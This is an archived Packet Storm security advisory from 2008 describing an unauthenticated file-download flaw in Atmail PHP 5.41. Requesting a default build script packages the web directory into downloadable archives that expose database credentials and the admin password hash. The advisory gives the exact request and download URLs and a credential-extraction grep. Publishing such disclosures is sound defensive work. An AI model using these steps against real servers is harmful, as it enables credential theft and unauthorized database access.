exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

atmail541-download.txt

atmail541-download.txt
Posted Jul 31, 2008

Atmail PHP version 5.41 suffers from a file download vulnerability that allows a remote attacker to gain access to database passwords and more.

tags | exploit, remote, php
SHA-256 | ec3f58e7752fa8bcc7bdf8d9621bc8f693e90c42861ea841fa7d9cdf8c9bf714

atmail541-download.txt

Change Mirror Download
@Mail PHP Version 5.41 patch Release
http://atmail.com/demo/atmailphpdemo.tgz


The default install of Atmail 5.41 creates the following
file in the atmail/ directory: build-plesk-upgrade.php

If that file is called via http, such as: http://example.com/atmail/build-plesk-upgrade.php
it will execute on the local server as expected:

nobody 19495 11.3 0.0 22572 8908 ? S 17:25 0:00 /usr/bin/php /usr/local/apache/htdocs/atmail/build-plesk-upgrade.php

producing numerous warnings and errors:

building @Mail-Plesk Pro upgrade
Warning: mkdir() [function.mkdir]: Permission denied in /usr/local/apache/htdocs/atmail/build-plesk-upgrade.php on line 32
making . dir... making /usr/local/atmail-plesk-upgrade/.

and when complete the following files will exist:

/usr/local/apache/htdocs/atmail:
-rw-r--r-- 1 nobody nobody 101754880 Jul 30 17:26 files.tar
-rw-r--r-- 1 nobody nobody 27162656 Jul 30 17:26 plesk-atmail-upgrade.tgz

Those files are the contents of the atmail/ directory. The plesk-atmail-upgrade.tgz
only contains the files.tar file.



Either file could then be downloaded:

http://example.com/atmail/files.tar
http://example.com/atmail/plesk-atmail-upgrade.tgz

or copied to another directory on the server for browsing through. The information
contained in those files includes the Atmail Config.php file which stores the Atmail
database username, password, and database server hostname in plain text:

$ egrep 'sql_(user|host|pass)' libs/Atmail/Config.php
'sql_host' => 'localhost',
'sql_pass' => '43s2H4N55X',
'sql_user' => 'atmail',

This information could then be used to access the Atmail database to obtain client credentials,
such as email addresses, usernames, passwords, session IDs, and more.

Also in the files.tar file is the webadmin/.htpasswd file, which contains the administrator
user's username and password hash.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close